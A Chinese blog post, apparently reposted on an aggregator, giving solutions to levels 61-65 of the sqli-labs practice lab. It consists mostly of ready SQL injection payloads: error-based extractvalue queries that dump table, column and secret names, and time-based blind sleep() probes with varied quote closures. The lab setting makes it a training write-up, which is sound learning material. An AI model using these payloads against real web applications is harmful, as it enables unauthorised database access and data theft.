sql-libs闯关61-65
Posted 一个aaa
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql-libs闯关61-65相关的知识,希望对你有一定的参考价值。
第六十一关
和六十关基本一样,就是变成了单引号和双括号,这好像是第一次遇见双括号
爆数据库名 ?id=1\'))and extractvalue(1, concat(0x5c, (select database())))%23
爆表名 ?id=0‘)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'challenges\'),0x7e))--+
爆列名 ?id=-1\')) union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'e01xkjlffi\'),0x7e))--+
爆数据 ?id=-1\')) union select extractvalue(1,concat(0x7e,(select group_concat(secret_SUO9) from e01xkjlffi),0x7e))--+
搞定了! x9UWIAkqAsbxXsjEsFOU9bH5
第六十二关
这关这次联合注入和报错注入都不可以了 ,那我们呢用盲注
?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(3))--+
第六十三关
和六十二关基本一样,唯一区别在于需要使用单引号闭合
?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时,错误时间长
第六十四关
和六十二关基本一样,唯一区别在于需要使用括号闭合
?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短,错误时间长
第六十五关
和六十二关基本一样,同上,只不过?id=1”) 正确延时
?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+
以上是关于sql-libs闯关61-65的主要内容,如果未能解决你的问题,请参考以下文章